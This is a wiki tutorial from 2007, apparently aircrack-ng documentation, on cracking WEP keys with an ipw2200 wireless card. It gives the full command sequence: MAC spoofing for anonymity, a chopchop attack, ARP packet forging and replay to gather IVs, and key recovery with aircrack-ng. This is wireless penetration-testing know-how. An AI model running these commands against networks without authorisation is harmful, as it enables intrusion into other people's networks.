User Tools

Site Tools


Tutorial: How to crack wep using an ipw2200 based card

Version: 0.1 August 27, 2007
By: drio


  1. How to compile from scratch the device driver to support injection
  2. screen usage example
  3. Different attacks
  4. More detailed explanation about what we are doing on each step
  5. upgrade airodump-ng tools from the livecd.


This document is based in this post you can find in the forums.

When I started using the aircrack-ng tools I did not have the best hardware for it. I only had an IBM Thinkpad T42 that comes with an Intel 2200BG card. Most of the wep attacks require to inject some packets in the network in order to speed up the process of gathering IVs. In order to do that, the device driver that we use for controlling our card has to support injection. This tutorial explains you how to compile and install modules in your linux box. Installing linux in my box was not an option so I decided to use the backtrack2 livecd. Backtrack comes already with the necessary drivers compiled and ready to be use directly from the cd.

Here are the basic steps we will be going through:

  • 1 - Verify that our ipw2200 card is recognized by the OS (Linux).
  • 2 - List available networks
  • 3 - Change the MAC address of our card.
  • 4 - Configure the wireless parameters using iwconfig.
  • 5 - Collect data with airodump-ng
  • 5 - Launch the chopchop attack
  • 6 - Create the ARP request packet
  • 7 - Send the ARP request over and over
  • 8 - Wait to gather enough IVs
  • 9 - Crack the WEP key using aircrack-ng

Keep in mind that we are going to be running different commands and we will need to check switch between them. Most documents recommend to start Xwindow and open then various xterminals. There is another option: screen.

Verify that our ipw2200 card is recognized by the OS (Linux)

Once the livecd has booted and you have logon, you can run this to verify that you actually have an ipw2200 base card:

      # lspci -vv 
      02:02.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05)
              Subsystem: Intel Corporation Unknown device 2711
              Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B-
              Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium >TAbort- <TAbort- <MAbort- >SERR- <PERR-
              Latency: 64 (750ns min, 6000ns max), Cache Line Size: 32 bytes
              Interrupt: pin A routed to IRQ 11
              Region 0: Memory at c0210000 (32-bit, non-prefetchable) [size=4K]
              Capabilities: [dc] Power Management version 2
              Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+)
              Status: D0 PME-Enable- DSel=0 DScale=1 PME-

That command will list all the PCI devices connected to the pci bus. You should see something similar to this when you run it on your machine. Note I removed most of the output.

Now, since you have an intel 2200BG base card, Linux should have autoloaded the ipw2200 device driver for you:

       # lsmod | grep ipw2200
       ipw2200    ......

When I used backtrack2 to test this, the rtap0 interface was not created after booting the livecd. We need the rtap0 up and running. We can tell the device driver to create the rtap_iface interface running:

       # echo 1 > /sys/class/net/eth1/device/rtap_iface

That's the method I would recommend. But, if you are using the latest version of airodump-ng (we'll use it in the next section) you can tell the program to create the rtap0 device for you:

       # airodump-ng -c X rtap0

We'll talk it in the next section.

Ok, so we have verified that we have an ipw2200 card and that Linux can talk to it.

List available networks

Now, we want to get a list of the wireless networks we have around. To do that:

       # iwconfig eth1 list

Keep the output of this command in a window we will use it later.


I am assuming that linux mapped your wireless card under eth1. Most likely you have an ethernet card under eth0.

Change the MAC address of our card

This step is optional but it will give us some anonymity. On a new window:

     # ifconfig eth1 up hw ether 00:11:22:33:44:55

Configure the wireless parameters

Let's start configuring the wireless essid, channel, and setting up a fake key:

     # iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed

Due to some limitations with the firmware we have to force a fakekey and set managed mode to ensure the aircrack-ng tools work properly.

ESSID is the name of the wireless network of our target AP. Channel is the wireless channel.

Collect data with airodump-ng

In another window, we start collecting data:

     # airodump-ng -c <channel> --bssid <AP MAC> -w dump rtap0

Notice how we use rtap0 as a input interface. Also, all these commands we are going to be running generate output files. So it is a good idea to create a new directory and to run all of them from there.

As we said before, if you are running the latest version of airodump-ng, rtap0 will be created for you automatically in case you didn't before.

Launch the chopchop attack

Now it is time to do some injection. In a new window we will launch the chopchop attack:

     # aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1

Note the modifier “-i rtap0.” This tells aireplay to use rtap0 for listening and eth1 for injecting. Also “-4” is the type of attack (chopchop).

A prompt will ask you to use “this” packet. Type “y” and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like “replay_dec-######.xor”

Make sure there are no errors reported after using aireplay. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.

If the attack fails, try to rerun the command again omitting the “-h <AP MAC>” parameter.

Create the arp request packet

Now we will create an arp-request packet using the acquired keysteam file. The “-l” and “-k” options are the source IP and destination IP. If you use valid destination IPs then you will be running an amplification attack. This can be run in the same window we run the chopchop attack:

   # packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k -l -y replay_dec-####.xor -w arp-request

Send the arp request over and over

Finally we will send our newly created arp-request packet over and over. After this step you should see the “Data” begin to rise quickly back in the window were we had airodump-ng running. If the data doesn't change (usually between 80 and 350 per second) then something is wrong.

    # aireplay-ng -2 -r arp-request eth1

Wait to gather enough IVs

We have to wait now so airodump-ng gathers enough data (enough IVs) so we can run aircrack-ng. How many packages we need so aircrack-ng cracks the wep key? It depends. The version of aircrack-ng that comes with backtrack2 is not the latest one so we need around 1.000.000 of IVs. If we are using the latest version (0.9 and up) 100.000 is enough.

Crack the wep key using aircrack-ng

In another window we launch:

    # aircrack-ng -z dump*.cap

Depending the number of packages you have gathered, this may take some minutes or you may get the key immediately. The -z argument tells aircrack-ng to also try the PTW attack. If you version of aircrack-ng doesn't support it, just omit it.


aircrack-ng can run concurrently with airodump-ng. This is very interesting because it will allow you to check the number of IVs that airodump-ng has gathered. You can cancel the execution of aircrack-ng and wait for more data to be gathered.

ipw2200_generic.txt · Last modified: 2009/09/26 14:27 by darkaudax